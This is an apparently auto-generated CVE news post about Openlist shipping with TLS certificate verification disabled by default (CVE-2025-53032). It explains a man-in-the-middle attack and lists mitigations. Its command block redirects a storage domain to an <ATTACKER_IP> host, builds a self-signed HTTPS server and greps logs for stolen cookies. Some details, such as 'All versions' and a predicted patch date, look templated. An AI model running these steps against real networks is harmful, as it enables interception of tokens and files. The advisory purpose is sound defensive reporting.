Openlist, TLS Certificate Verification Disable by Default, CVE-2025-53032 (Critical)

Listen to this Post

The vulnerability exists in the `DefaultConfig()` function within internal/conf/config.go, where the `TlsInsecureSkipVerify` parameter is set to `true` by default. This configuration disables TLS certificate verification for all outgoing HTTPS connections made by the application’s storage drivers. When the application communicates with a cloud storage provider (e.g., Weiyun), it initiates a TLS handshake but does not validate the server’s certificate chain, issuer, or hostname.
An attacker can exploit this by performing a Machine-in-the-Middle (MitM) attack via ARP spoofing, DNS hijacking, or a rogue network access point. By redirecting traffic to a server they control, the attacker presents any TLS certificate—valid, self-signed, or expired. Since verification is skipped, the vulnerable application accepts this certificate and establishes an encrypted connection with the attacker’s server, believing it to be legitimate. All subsequent data, including authentication tokens, cookies, and file contents, is transmitted through this channel, allowing the attacker to fully decrypt, steal, and manipulate the data stream without detection.
Platform: Openlist
Version: All versions
Vulnerability: Default TLS verification disabled
Severity: Critical
date: 2025-12-18

Prediction: Patch 2026-03-18

What Undercode Say:

Simulate DNS hijacking within container
docker exec -it openlist /bin/sh -c "echo '<ATTACKER_IP> www.weiyun.com' >> /etc/hosts"
Build malicious HTTPS server
openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout certs/server.key -out certs/server.crt
docker build -t httpd-test-ssl .
Monitor stolen data
tail -f /usr/local/apache2/logs/headers.log | grep "Cookie:"

How Exploit:

1. Attacker positions on network (Wi-Fi/LAN).

2. Redirects storage domain via ARP/DNS spoofing.

3. Hosts malicious TLS endpoint.

4. Vulnerable app connects, sends secrets.

5. Attacker logs/intercepts all data.

Protection from this CVE:

1. Set `TlsInsecureSkipVerify: false`.

2. Enforce certificate pinning.

3. Use VPN/secure network.

4. Patch application immediately.

Impact:

Full data decryption

Authentication theft

Storage manipulation

Integrity loss

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top